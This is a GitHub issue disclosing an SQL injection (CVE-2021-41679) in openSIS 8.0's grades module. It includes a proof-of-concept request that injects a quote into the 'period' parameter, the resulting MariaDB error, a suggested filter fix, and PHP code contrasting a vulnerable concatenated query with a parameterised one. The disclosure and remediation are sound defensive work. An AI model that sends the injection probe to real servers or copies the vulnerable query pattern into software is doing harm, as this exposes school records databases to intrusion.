CVE-2021-41679: SQL INJECTION IN FUNCTION /INPUTFINALGRADES.PHP · Issue #204 · OS4ED/openSIS-Classic
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/modules/grades/InputFinalGrades.php, period parameter.
POC:
REQUEST:
GET /Modules.php?modname=users/TeacherPrograms.php?include=grades/InputFinalGrades.php&include_inactive=&modfunc=gradebook&mp=21&use_percents=true&period=2'6 HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1
RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8
[…]
SQL:
SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID FROM course_periods cp,course_period_var cpv WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID AND cpv.ID=2'6
Traceback:
/var/www/opensis/modules/grades/InputFinalGrades.php at 55
Additional Information:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''6' at line 1
[…]
SOLUTION:
Pass $_REQUEST['period'] through sqlSecurityFilter() before it is inserted into the "SELECT" query:
$period = sqlSecurityFilter($_REQUEST['period']);
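The remediation above, shown as an added example that is not openSIS code: the concatenation pattern the report describes beside a hardened version of the same query. It assumes a mysqli connection `$db` and that `cpv.ID` is an integer column (as `cpv.ID=2` in the logged query suggests); parameter binding is used here as the hardening step in place of the page's `sqlSecurityFilter()`.

```php
<?php
// Added example, not openSIS code. Assumptions: $db is an open mysqli
// connection and cpv.ID is an integer column.

// VULNERABLE: the raw request value becomes part of the SQL text, so a value
// such as "2'6" alters the statement and yields the syntax error in the report.
function getMarkingPeriodUnsafe(mysqli $db, array $request): ?array
{
    $sql = 'SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID'
         . ' FROM course_periods cp,course_period_var cpv'
         . ' WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID'
         . ' AND cpv.ID=' . $request['period'];
    $result = $db->query($sql);   // throws or returns false on malformed SQL
    return $result ? $result->fetch_assoc() : null;
}

// HARDENED: validate the type first, then bind the value as a parameter so
// the database never interprets it as SQL.
function getMarkingPeriodSafe(mysqli $db, array $request): ?array
{
    // cpv.ID is numeric (assumption), so anything that is not a plain integer
    // is rejected before it reaches the database; "2'6" fails this check.
    $period = filter_var($request['period'] ?? '', FILTER_VALIDATE_INT);
    if ($period === false) {
        return null;
    }
    $stmt = $db->prepare(
        'SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID'
        . ' FROM course_periods cp,course_period_var cpv'
        . ' WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID'
        . ' AND cpv.ID=?'
    );
    $stmt->bind_param('i', $period);   // bound as an integer, never as SQL text
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}
```

With the hardened version, a request carrying period=2'6 is rejected at the integer check and no query is sent, so the database error the report shows (and the injection behind it) cannot occur.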